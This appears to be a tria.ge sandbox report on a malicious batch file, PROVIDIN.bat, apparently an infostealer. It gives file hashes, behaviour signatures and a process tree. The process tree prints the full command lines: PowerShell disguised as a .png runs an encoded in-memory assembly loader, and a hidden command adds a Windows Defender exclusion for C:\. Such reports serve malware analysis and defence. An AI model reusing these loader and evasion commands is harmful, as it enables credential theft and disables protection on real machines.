Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
8s -
max time network
29s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
26/08/2023, 17:24
Static task
static1
Behavioral task
behavioral1
Sample
PROVIDIN.bat
Resource
win7-20230712-en
General
-
Target
PROVIDIN.bat
-
Size
941KB
-
MD5
44e614f87ec86a7bf36c4e9e6255c69c
-
SHA1
5be290a0d38ee0082edad7f8b2a63eaa06ae4d05
-
SHA256
98cb4451f1bd561121d0ca74d5a114f7ed0b78dd82a748638b2b3c6eec741cf5
-
SHA512
bbdcdba3ca8ce9b801c517dfbfeb25c80fb97107694a4c26592e62f680cb50061ac772f509ff02c177adf465447ed2889f4114c10743d59327291c8ad0bd245c
-
SSDEEP
24576:LLLFoXm8uCm/0gzIKoudoQw2bsGtAXl4XH:nLFoDuj/nEKJsnl4XH
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4964 Bjlxopqy.png -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4964 Bjlxopqy.png 4964 Bjlxopqy.png 4964 Bjlxopqy.png 4964 Bjlxopqy.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4964 Bjlxopqy.png Token: SeDebugPrivilege 4964 Bjlxopqy.png -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3748 wrote to memory of 3124 3748 cmd.exe 84 PID 3748 wrote to memory of 3124 3748 cmd.exe 84 PID 3124 wrote to memory of 3328 3124 cmd.exe 87 PID 3124 wrote to memory of 3328 3124 cmd.exe 87 PID 3124 wrote to memory of 3484 3124 cmd.exe 86 PID 3124 wrote to memory of 3484 3124 cmd.exe 86 PID 3124 wrote to memory of 1020 3124 cmd.exe 88 PID 3124 wrote to memory of 1020 3124 cmd.exe 88 PID 3124 wrote to memory of 1992 3124 cmd.exe 89 PID 3124 wrote to memory of 1992 3124 cmd.exe 89 PID 3124 wrote to memory of 4964 3124 cmd.exe 90 PID 3124 wrote to memory of 4964 3124 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PROVIDIN.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PROVIDIN.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Bjlxopqy.png3⤵PID:3484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:3328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1020
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\PROVIDIN.bat C:\Users\Admin\AppData\Local\Temp\Bjlxopqy.png.bat3⤵PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\Bjlxopqy.pngC:\Users\Admin\AppData\Local\Temp\Bjlxopqy.png -win 1 -enc JABTAGQAdgBkAHAAbABrAHkAYQAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABMAGkAbgBlAHMAKAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgAuAGIAYQB0ACIAKQAsACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBsAGEAcwB0ACAAMQA7ACAAJABPAHgAcwBhAG8AZQBpAGoAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABTAGQAdgBkAHAAbABrAHkAYQApADsAJABUAGUAZgBzAGQAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQATwB4AHMAYQBvAGUAaQBqAGwAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATQBoAGIAeABjAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABUAGUAZgBzAGQAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATQBoAGIAeABjAHEAZQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQATQBoAGIAeABjAHEAZQAuAEMAbABvAHMAZQAoACkAOwAkAFQAZQBmAHMAZAB6AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQATwB4AHMAYQBvAGUAaQBqAGwAIAA9ACAAJABvAHUAdABwAHUAdAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATwB4AHMAYQBvAGUAaQBqAGwAKQA7ACAAJABTAHgAawBsAHQAdQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABPAHgAcwBhAG8AZQBpAGoAbAApADsAIAAkAEQAZQBwAHYAeQByAG8AcgB1ACAAPQAgACQAUwB4AGsAbAB0AHUALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABVAGkAcQBhAGEAYgB1ACAAPQAgACQARABlAHAAdgB5AHIAbwByAHUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵PID:4504
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
941KB
MD544e614f87ec86a7bf36c4e9e6255c69c
SHA15be290a0d38ee0082edad7f8b2a63eaa06ae4d05
SHA25698cb4451f1bd561121d0ca74d5a114f7ed0b78dd82a748638b2b3c6eec741cf5
SHA512bbdcdba3ca8ce9b801c517dfbfeb25c80fb97107694a4c26592e62f680cb50061ac772f509ff02c177adf465447ed2889f4114c10743d59327291c8ad0bd245c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82